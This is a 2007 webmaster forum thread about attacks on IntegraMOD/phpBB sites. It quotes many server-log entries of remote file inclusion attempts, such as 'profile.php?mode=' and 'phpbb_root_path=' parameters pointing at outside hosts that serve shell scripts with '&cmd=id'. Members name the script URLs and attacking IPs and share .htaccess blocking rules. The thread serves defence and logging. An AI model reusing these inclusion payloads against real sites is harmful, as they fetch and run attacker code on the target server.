IntegraMOD

01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 02:33 pm /forum/profile.php?mode=http://www.alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 200.138.244.203
5 29 Apr 2007 11:18 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
6 29 Apr 2007 11:45 am /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
7 29 Apr 2007 11:45 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.18.93.107
8 29 Apr 2007 10:16 am /forum/profile.php?mode=http://www.zjkjw.gov.cn/tool25.txt?&cmd=id 200.181.152.9
9 29 Apr 2007 09:22 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.79.243
10 28 Apr 2007 10:29 pm /forum/profile.php?mode=http://www.Vel0zBR.xpg.com.br/Owner/cmd1.txt?&cmd=id 200.153.54.199
11 27 Apr 2007 06:23 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.2.78.239
12 26 Apr 2007 06:44 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 200.97.25.94
13 25 Apr 2007 11:19 pm /forum/profile.php?mode=http://br.geocities.com/ngrdownz/list.txt?&cmd=id 213.22.52.189
14 25 Apr 2007 11:10 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137
15 25 Apr 2007 07:49 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137

Note: Anytime I tried to add one of those address's to agent blocker it would break the site. CrackTracker would throw a bunch of code line at the top of the page.

Thought I'd add a few more.

1 08 May 2007 07:16 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.67.182.247
2 08 May 2007 05:11 pm /forum/profile.php?mode=http://www.freewebs.com/dropcmd/tool25.dat?&cmd=id 189.13.156.90
3 08 May 2007 11:20 am /forum/profile.php?mode=http://dropcmd.netfast.org/tool25.txt?&cmd=id 201.9.15.12
4 08 May 2007 01:17 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 189.13.114.100
5 07 May 2007 11:54 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.9.96.227
6 06 May 2007 09:21 pm /forum/profile.php?mode=http://www.tools25.kit.net/tool25.dat?&cmd=id 201.8.90.148

Have you run into this tool yet?

http://securityjobs.us/xpl/tembak.txt?

I think this one gets tru but I'm not 100% sure.
I have 4 hits from it and the forum goes down to a .script kiddie pr message.

Good initiative Omni-Lee. I leave here my contribution.

201.50.228.87
04 Jul 2007 01:11 am /forum/IM141/profile.php?mode=http://www.butterbeidefische.de/DB59528/tool25.txt?&cmd=id
[hr:1wyttcgu]
libwww-perl/5.69 217.110.144.106
13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
/forum/viewtopic.php?printertopic=1&t=9&start=0&postdays=0&postorder=asc&vote=viewresult//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?

I have been getting slammed with lots of similar stuff daily from about 10 different domains. Each day it a whole new block of domains. But thank god none of them have work as they get caught and dumpped as 403 errors.

Once I noticed I did spend the first few days reporting sites getting them shut down but once I realized they change domains daily it doesn't make any sense andits mucho work.

Though I have been editing mt htaccess to block any traffic form said urls ever again when they start the rotation of domains over at some point.

Though I have been editing my htaccess to block any traffic form said urls ever again when they start the rotation of domains over at some point.

I'm using the ip's not the url's, i know the ip's are proxies but I figure I've a better chance to block. (although that .script didn't work the prox did... so if i block the prox I may well stop a run with a .script that does work.)

As soon as i get a attempt I add the ip to the htaccess, this creates a update to my proxy ban list. Also I have started adding " # date " (rem statements) once the prox is dead it could be removed from the list and help keep the htaccess file size down as I think the file gets processed on every hit.

one more.
/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

I've got serious attacks (hopefully blocked) several times a day on my portal!


[color=red]62.60.137.49
Fri 20 Jul 2007, 5]


This proove that people complaining here about the insecurity of IM or the innutility of CrackerTracker are just idiots in my opinion <img>

yea my logs look like that too, for all the trouble setting up CT I got to say it was worth it. <img>

still was not for this but should be barely... <img>

This brutes do not have life, do not eat, do not drink, do not sleep, I have there xxx but I find that also do not want.

yep, I had to change domains and get a new host from all of that. I changed domains so they wouldn't just follow me to my new host, and had to get a new host from so many hack attempts I was over my traffic limits for CGI.

Buddy just lost 3 of his 141 IM forums today. They deleted everything. He dunno how they got root access but all is gone.

Although I don't like doing this I have added this to my htaccess file. It's really cut back the number of runs on my forum.

jomasaco, I think you need to add it for sure!

RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]

So you need it to look like this in the htaccess file.

Code: Select all

 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]# end testRewriteRule ^.* - [F,L]  

If the rewriteengine is already on just add the first line in the quote if not add the whole code to the file so it will process it.

Code: Select all

 RewriteEngine On# testing user agent blockingRewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]# end testRewriteRule ^.* - [F,L]  

Definitly interresting, thank you <img>

NP whisky, day 4 since i added that myself. On a side note it's been nice and quiet. <img>

When my IM site got hit a while back, I ended up blocking URL's with "/includes" or "/function*" in them.

Note: I also turned off allow_fopen_url in the php.ini

.htaccess or httpd.conf
===============

<Files>
Order allow,deny
Deny from all
</Files>

<Files>
Order allow,deny
Deny from all
</Files>



We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

[Fri Aug 17 15:06:54 2007] [error] [client 203.32.125.78] client denied by server configuration: /websites/HG/html/includes/functions_portal.php


I like the URL Rewrite as well though. May consider that as a follow-up to catch the others that arent using the include or function* paths.